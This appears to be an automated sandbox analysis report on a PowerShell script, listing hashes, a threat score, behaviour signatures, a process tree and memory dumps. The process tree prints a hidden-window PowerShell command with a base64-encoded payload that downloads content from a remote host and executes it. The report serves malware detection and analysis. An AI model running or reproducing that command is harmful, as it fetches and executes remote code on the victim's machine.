Analysis

  • max time kernel
    25s
  • max time network
    126s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    25-08-2021 20:27

General

  • Target

    work.ps1

  • Size

    1.4MB

  • MD5

    7ba4b5c5d3e3276a3cfe8d581cf7173b

  • SHA1

    79ba87b46562e75f097c1b6d23d3b63b9160bbaa

  • SHA256

    73737bf28fa00ea1380bf98a76f6c2ff34bf25e8b489750acccc45df8e898022

  • SHA512

    ccccc4402edc1c333f2b11955b4c2850f5b68674e473d57521cb009e2047a46f9c57c0151b9191d4a2e3b10931723d0191bba9b299ffb3bb293ff7d6f83598c6

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\work.ps1
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4044
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -enc JABNAD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAnAGgAdAB0AHAAOgAvAC8AYQB0AGgAaQBuAGcAYwBhAGwAbABlAGQAYwBhAGsAZQAuAGMAbwBtAC8AZgBpAGwAZQAnACkAOwAkAHQAPQAkAE0ALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAJABSAD0AJAB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQARgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACQAUgA7ACQAcAA9ACQARgAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AGkAZQB4ACgAJABwACkAOwAgAA==
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2092
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 2092 -s 2488
        3⤵
        • Program crash
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1316

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2092-176-0x000001FE45040000-0x000001FE45042000-memory.dmp

    Filesize

    8KB

  • memory/2092-177-0x000001FE45043000-0x000001FE45045000-memory.dmp

    Filesize

    8KB

  • memory/2092-181-0x000001FE45046000-0x000001FE45048000-memory.dmp

    Filesize

    8KB

  • memory/4044-118-0x0000024BA6130000-0x0000024BA6131000-memory.dmp

    Filesize

    4KB

  • memory/4044-121-0x0000024BA6330000-0x0000024BA6331000-memory.dmp

    Filesize

    4KB

  • memory/4044-122-0x0000024BA61A0000-0x0000024BA61A2000-memory.dmp

    Filesize

    8KB

  • memory/4044-123-0x0000024BA61A3000-0x0000024BA61A5000-memory.dmp

    Filesize

    8KB

  • memory/4044-142-0x0000024BA61A6000-0x0000024BA61A8000-memory.dmp

    Filesize

    8KB

  • memory/4044-180-0x0000024BA61A8000-0x0000024BA61A9000-memory.dmp

    Filesize

    4KB